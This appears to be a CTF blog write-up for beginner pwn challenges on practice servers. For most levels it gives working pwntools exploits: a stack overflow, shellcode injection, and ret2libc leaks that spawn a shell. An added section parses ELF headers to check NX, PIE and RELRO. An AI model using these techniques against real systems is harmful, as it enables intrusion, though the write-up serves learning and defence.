pwn_start

Posted by marginal on 2021-10-04

pwn basics: the "level" challenges

level0:

Stack overflow

from pwn import *

r = remote('node4.buuoj.cn', xxxxx)   # port elided in the original post
# 0x80-byte buffer plus 8 bytes of saved rbp, then the saved return address
payload = b'a' * (0x80 + 8) + p64(0x0000000000400596)
r.sendline(payload)
r.interactive()

level1:

shellcode

from pwn import *

r = process(['/mnt/d/TH/ctf/buuoj/level1'])
# pwntools defaults to i386, which matches this 32-bit binary
shellcode = asm(shellcraft.sh())
# the program prints the buffer address; slice the hex value out of that line
buf = r.recvline()[14:-2]
buf = int(buf, 16)
# shellcode first, pad out to 136 + 4 bytes, then overwrite the saved return address with the buffer address
payload = shellcode + b'a' * (136 + 4 - len(shellcode)) + p32(buf)
r.sendline(payload)
r.interactive()

level2:

Hijack rip and jump to the system function, having pushed the argument onto the stack beforehand.

level3:

Use write to print write's address from the GOT, get the offset from it, and then compute the actual addresses of system and "/bin/sh" in the library (address leak).

from pwn import *

r = connect("pwn2.jarvisoj.com", 9879)
#r = process(['/mnt/d/TH/ctf/buuoj/level2'])
#shellcode = asm(shellcraft.sh())
elf = ELF("./level3")
writeplt = elf.plt["write"]
writegot = elf.got["write"]
fun = elf.symbols["vulnerable_function"]
lib = ELF("./libc-2.19.so")   # loaded but not used below; the offsets are hard-coded instead
# offsets inside libc-2.19.so: write, system, and the "/bin/sh" string
writelib = 0x000DD460
systemlib = 0x00040310
bsh = 0x00162D4C
buf = r.recvline()   # consume the banner line
# stage 1: write(1, &got[write], 4), then return into vulnerable_function for a second overflow
payload = b'a' * (136 + 4) + p32(writeplt) + p32(fun) + p32(1) + p32(writegot) + p32(4)
r.sendline(payload)
writeaddr = u32(r.recvline()[0:4])
# stage 2: libc base is writeaddr - writelib; call system("/bin/sh") with a dummy return address
payload = b'a' * (136 + 4) + p32(writeaddr - writelib + systemlib) + p32(0) + p32(writeaddr - writelib + bsh)
r.sendline(payload)
r.interactive()

level4:

Used the LibcSearcher tool. I originally wanted to use dyn, but for some reason it threw an error. What LibcSearcher finds are the official libraries; dyn dumps the target machine's library directly.

from pwn import *
from LibcSearcher import *

r = connect("pwn2.jarvisoj.com", 9880)
#r = process(['/mnt/d/TH/ctf/jarvis/level4'])
#shellcode = asm(shellcraft.sh())
e = ELF("./level4")
writeplt = e.plt["write"]
writegot = e.got["write"]
readplt = e.plt["read"]
data_seg = 0x0804A01C   # writable .data address used to store the "/bin/sh" string
fun = e.symbols["vulnerable_function"]
# stage 1: leak write's GOT entry, then return into vulnerable_function again
payload = b'a' * (0x88 + 0x4) + p32(writeplt) + p32(fun) + p32(1) + p32(writegot) + p32(4)
r.sendline(payload)
writeaddr = u32(r.recv(4))
# identify the libc from the leaked address and compute the load offset
libc = LibcSearcher("write", writeaddr)
deviation = writeaddr - libc.dump("write")
sys_addr = libc.dump("system") + deviation
# stage 2: read(0, data_seg, 8) to place "/bin/sh\n" in .data, then return into vulnerable_function
payload = b'a' * (0x88 + 0x4) + p32(readplt) + p32(fun) + p32(0) + p32(data_seg) + p32(0x8)
r.sendline(payload)
r.sendline(b"/bin/sh")   # bytes, so the script also runs under Python 3 without a BytesWarning
# stage 3: system(data_seg)
payload = b'a' * (0x88 + 0x4) + p32(sys_addr) + p32(0) + p32(data_seg)
r.sendline(payload)
r.interactive()
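Every one of level0 to level4 works only because a particular mitigation is absent from the binary: level1's stack shellcode needs an executable stack (no NX), the fixed PLT and function addresses in level3 and level4 need a non-PIE binary, and the GOT-based tricks need a GOT that is not read-only. The first thing to check, whether you are grading a build or deciding how hard a target is, is therefore which of these the compiler and linker actually turned on. The following is an added example, not code from the original post: a small stand-alone parser that reads the ELF program headers (PT_GNU_STACK, PT_GNU_RELRO, PT_DYNAMIC) and reports NX, PIE and RELRO, plus the linker flags a defender would add. The function names `parse_elf_mitigations`, `missing_mitigations` and `build_sample_elf` are my own, and `build_sample_elf` only constructs header-only ELF images for offline testing; it does not produce a runnable program. The stack canary is not detected here, since that needs the symbol tables.

```python
import struct

# ELF constants, as defined in the ELF specification and the GNU extensions
ET_EXEC, ET_DYN = 2, 3
PT_LOAD, PT_DYNAMIC = 1, 2
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
DT_NULL, DT_FLAGS, DT_FLAGS_1 = 0, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1


def _dynamic_binds_now(data, offset, size, is64, end):
    """Walk the PT_DYNAMIC entries and report whether BIND_NOW is requested (needed for full RELRO)."""
    fmt, step = (end + "qQ", 16) if is64 else (end + "iI", 8)
    for off in range(offset, offset + size, step):
        d_tag, d_val = struct.unpack_from(fmt, data, off)
        if d_tag == DT_NULL:
            break
        if (d_tag == DT_FLAGS and d_val & DF_BIND_NOW) or (d_tag == DT_FLAGS_1 and d_val & DF_1_NOW):
            return True
    return False


def parse_elf_mitigations(data):
    """Report NX, PIE and RELRO for an ELF image given as bytes (32- or 64-bit, either endianness)."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = data[4] == 2
    end = "<" if data[5] == 1 else ">"
    e_type, = struct.unpack_from(end + "H", data, 16)
    if is64:
        e_phoff, = struct.unpack_from(end + "Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 54)
    else:
        e_phoff, = struct.unpack_from(end + "I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 42)
    stack_exec = True  # without PT_GNU_STACK, x86 Linux historically assumed an executable stack
    has_relro = bind_now = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if is64:   # Elf64_Phdr: type, flags, offset, vaddr, paddr, filesz, ...
            p_type, p_flags, p_offset, _, _, p_filesz = struct.unpack_from(end + "IIQQQQ", data, off)
        else:      # Elf32_Phdr: type, offset, vaddr, paddr, filesz, memsz, flags, ...
            p_type, p_offset, _, _, p_filesz, _, p_flags = struct.unpack_from(end + "IIIIIII", data, off)
        if p_type == PT_GNU_STACK:
            stack_exec = bool(p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            has_relro = True
        elif p_type == PT_DYNAMIC:
            bind_now = _dynamic_binds_now(data, p_offset, p_filesz, is64, end)
    relro = "full" if has_relro and bind_now else "partial" if has_relro else "none"
    return {"nx": not stack_exec, "pie": e_type == ET_DYN, "relro": relro}


def missing_mitigations(report):
    """Turn a report into the GCC/Clang link flags a defender would add."""
    fixes = []
    if not report["nx"]:
        fixes.append("-z noexecstack (stack shellcode, as in level1, runs otherwise)")
    if not report["pie"]:
        fixes.append("-fPIE -pie (otherwise PLT and function addresses are fixed, as in level3/level4)")
    if report["relro"] != "full":
        fixes.append("-z relro -z now (otherwise the GOT stays writable after load)")
    return fixes


def build_sample_elf(is64, pie, nx, relro, bind_now):
    """Constructed minimal ELF image (headers plus a dynamic section, no code) for offline testing."""
    ehsize, phentsize = (64, 56) if is64 else (52, 32)
    nph = 3
    dyn_off = ehsize + nph * phentsize   # dynamic section follows the program headers
    flags = DF_BIND_NOW if bind_now else 0
    dyn = struct.pack("<qQqQ" if is64 else "<iIiI", DT_FLAGS, flags, DT_NULL, 0)

    def phdr(p_type, p_flags, p_offset, p_filesz):
        if is64:
            return struct.pack("<IIQQQQQQ", p_type, p_flags, p_offset, 0, 0, p_filesz, p_filesz, 0)
        return struct.pack("<IIIIIIII", p_type, p_offset, 0, 0, p_filesz, p_filesz, p_flags, 0)

    body = phdr(PT_GNU_STACK, PF_R | PF_W | (0 if nx else PF_X), 0, 0)
    body += phdr(PT_GNU_RELRO if relro else PT_LOAD, PF_R, 0, 0)
    body += phdr(PT_DYNAMIC, PF_R | PF_W, dyn_off, len(dyn))
    ident = b"\x7fELF" + bytes([2 if is64 else 1, 1, 1, 0]) + b"\x00" * 8   # class, little-endian, v1, SysV ABI
    e_type = ET_DYN if pie else ET_EXEC
    if is64:
        ehdr = ident + struct.pack("<HHIQQQIHHHHHH", e_type, 62, 1, 0, ehsize, 0, 0, ehsize, phentsize, nph, 0, 0, 0)
    else:
        ehdr = ident + struct.pack("<HHIIIIIHHHHHH", e_type, 3, 1, 0, ehsize, 0, 0, ehsize, phentsize, nph, 0, 0, 0)
    return ehdr + body + dyn


if __name__ == "__main__":
    import sys
    # with a path argument, inspect a real file; otherwise inspect a constructed image with nothing enabled
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_elf(False, False, False, False, False)
    report = parse_elf_mitigations(data)
    print(report, missing_mitigations(report))
```

Run it as `python3 elfcheck.py ./level3` against a real binary. pwntools already exposes the same information, including the canary, through `ELF("./level3").checksec()`; the value of writing the parser by hand is seeing that all three answers come straight from the program headers, which is also why a stripped binary cannot hide them.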

level5:

